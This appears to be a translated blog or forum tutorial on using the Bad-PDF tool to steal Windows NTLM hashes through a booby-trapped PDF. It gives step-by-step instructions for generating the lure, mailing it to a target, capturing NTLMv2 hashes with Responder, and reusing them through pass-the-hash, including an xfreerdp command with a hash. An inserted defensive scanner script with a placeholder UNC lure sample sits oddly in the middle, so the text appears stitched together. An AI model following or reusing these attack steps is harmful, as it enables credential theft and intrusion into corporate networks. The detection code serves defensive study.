Bad-PDF - attack via infected PDF file

Father

To carry out the attack, it is enough to generate a PDF file and send it to the target.

Today we will look at the relatively new Bad-PDF utility from Deepzec and its ability to steal NTLM data and hashes from Windows. It is not yet detected by most antiviruses. The code was posted on GitHub about 10 days ago.

According to Check Point researchers, instead of exploiting a vulnerability in Microsoft Word files or in Outlook's RTF processing, attackers use a legitimate PDF feature that allows remote documents and files to be embedded in a PDF. An attacker can use this to insert a reference to an external resource into the PDF, so that when the PDF is opened, the reader automatically reaches out to it and leaks the user's credentials in the form of NTLM hashes.
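Because the lure relies on structural features of the PDF rather than on an exploit, a defender can triage incoming documents by looking for exactly those features: an automatic trigger (/OpenAction or /AA) combined with an action that points the reader at a file outside the document (/GoToR, /GoToE, /Launch) or a UNC path in a string. The script below is an added example written for this post, not code from the Bad-PDF project or from the post's author; it assumes a Bad-PDF-style lure needs such indicators (the post does not show the file's internals), it also inflates FlateDecode streams so an action dictionary hidden in a compressed object is still seen, and the two embedded sample documents are constructed here with EXAMPLE-HOST as a placeholder.

```python
import re
import zlib

# Name objects that make a reader act as soon as the document opens, and action
# types that can point the reader at a file or URL outside the document.
AUTO_TRIGGERS = (b"/OpenAction", b"/AA")
REMOTE_FILE_ACTIONS = (b"/GoToR", b"/GoToE", b"/Launch", b"/ImportData")
URL_ACTIONS = (b"/URI", b"/SubmitForm")

# Inside a PDF literal string a backslash is escaped, so a UNC path \\host\share is
# written as (\\\\host\\share); accept two or more backslashes before the host name.
UNC_RE = re.compile(rb"\\{2,}[A-Za-z0-9_.\-]+\\+")
# Stream bodies are written here as "stream\n<bytes>\nendstream", so match exactly that.
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\nendstream", re.DOTALL)


def _inflate_streams(data: bytes) -> bytes:
    """Concatenate the plaintext of every stream that inflates cleanly with zlib."""
    out = []
    for body in STREAM_RE.findall(data):
        try:
            out.append(zlib.decompress(body))
        except zlib.error:
            continue  # not Flate-compressed or damaged; the raw bytes are scanned anyway
    return b"\n".join(out)


def scan_pdf_bytes(data: bytes) -> dict:
    """Count suspicious indicators in the raw bytes plus the inflated stream contents."""
    text = data + b"\n" + _inflate_streams(data)
    findings = {}
    for name in AUTO_TRIGGERS + REMOTE_FILE_ACTIONS + URL_ACTIONS:
        # (?![A-Za-z]) keeps /AA from matching a longer name such as /AAbc
        count = len(re.findall(re.escape(name) + rb"(?![A-Za-z])", text))
        if count:
            findings[name.decode()] = count
    remote = len(UNC_RE.findall(text)) + text.lower().count(b"file://")
    if remote:
        findings["remote_path"] = remote
    return findings


def verdict(findings: dict) -> str:
    """Rate the findings: an auto-trigger plus an external-file reference is the lure pattern."""
    auto = any(k in findings for k in ("/OpenAction", "/AA"))
    remote_file = "remote_path" in findings or any(
        a.decode() in findings for a in REMOTE_FILE_ACTIONS)
    url = any(a.decode() in findings for a in URL_ACTIONS)
    if auto and remote_file:
        return "high"      # opens and immediately reaches for something off-document
    if remote_file or (auto and url):
        return "medium"
    if auto or url:
        return "low"       # /OpenAction to a page, or a plain web link: usually benign
    return "clean"


# --- constructed samples, not documents from the post --------------------------------
SAMPLE_CLEAN = (
    b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n%%EOF\n"
)

# The action dictionary is hidden inside a FlateDecode stream, as a lure might do to
# defeat a plain string search. EXAMPLE-HOST is a placeholder, not a real share.
_ACTION = b"<< /S /GoToR /F (\\\\\\\\EXAMPLE-HOST\\\\share\\\\lure.pdf) /D [0 /Fit] >>"
_Z = zlib.compress(_ACTION)
SAMPLE_SUSPECT = (
    b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>\nendobj\n"
    b"3 0 obj\n<< /Length " + str(len(_Z)).encode() + b" /Filter /FlateDecode >>\n"
    b"stream\n" + _Z + b"\nendstream\nendobj\n%%EOF\n"
)


def scan_file(path: str) -> tuple:
    """Scan a PDF on disk and return (verdict, findings)."""
    with open(path, "rb") as fh:
        findings = scan_pdf_bytes(fh.read())
    return verdict(findings), findings


if __name__ == "__main__":
    import sys
    if sys.argv[1:]:
        for path in sys.argv[1:]:
            print(path, *scan_file(path))
    else:  # no arguments: run against the two constructed samples
        for label, blob in (("clean", SAMPLE_CLEAN), ("suspect", SAMPLE_SUSPECT)):
            found = scan_pdf_bytes(blob)
            print(label, verdict(found), found)
```

Run it as `python scan_pdf.py mail-attachment.pdf` on a mail gateway or sandbox; the constructed suspect sample rates "high" while the clean one rates "clean". A "high" verdict is a reason to detonate the file in an isolated VM and to check whether the workstation made an outbound SMB (TCP 445) connection when it was opened, since that connection is the actual leak; blocking outbound 445 at the perimeter and restricting NTLM through Group Policy stops the leak regardless of how the document is built.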

How to carry out an attack?
We run standard commands. I have been testing on Kali Linux:
Code:
# git clone https://github.com/deepzec/Bad-Pdf.git
# cd Bad-Pdf
# chmod +x badpdf.py
# python badpdf.py

This opens a dialog menu. To proceed we need the IP of our target, the network interface, and a name for the file. After launching, we are asked for the path to Responder if it is not detected automatically:
Code:
/usr/sbin/responder    (1)

Next, we specify the IP address (2), the file name (3), and select the interface (4). After that the process starts. If you get errors, the interface may be wrong; in that case it is better to enter it manually.

If everything worked, move on to the next step: delivering the file to the target. It is written to the root of the Bad-Pdf folder. Delivery can be by mail, social networks, or some other way. I used mail and sent it to a potential target.

Next, we wait for the file to be opened. After a successful attack we immediately receive the NTLM data, as the screenshot in the original post shows:

Thus, after successful completion, we obtain the data in NTLMv2 form.

How can this vulnerability be exploited?
pth-winexe
The point is that this attack is most relevant in corporate networks. There is a major weakness in both versions of the NTLM protocol: to authenticate, it is enough to know only the user's hash. So, having obtained a hash as shown above, you can act on the network with the compromised user's privileges. This technique is called Pass The Hash and was first used in 1997. The most popular set of utilities for it is the Pass-the-Hash Toolkit. Let's take a closer look at pth-winexe, which is available out of the box in Kali Linux.

FreeRDP
Another utility from the set is FreeRDP. It is a Remote Desktop Protocol console client. One of the features of the client is the ability to use a password hash instead of the password itself.

Example command:
Code:
xfreerdp /d:win2012 /u:offcec /pth:8846F7EAEE8FB117AD06BDD830B7586C /v:192.168.0.1
where /d: is the domain name,
/u: the username,
/pth: the hash,
/v: the server IP.

Windows vs Microsoft

Also, modern versions of Windows prompt you to create a Microsoft account. Do you see the chain? Having obtained the local account's credentials with the Bad-Pdf utility, you can go further and get access to mail, Skype and whatever other Microsoft services are in use. That is why this vulnerability is so interesting and has such a wide range of uses.

Conclusion
Double-check the links and files you open. This is very important, as a single such file can hand all of your data to a hacker. Use virtual machines and data encryption in all cases. For this particular attack, it is enough to disable NTLM connections in Group Policy.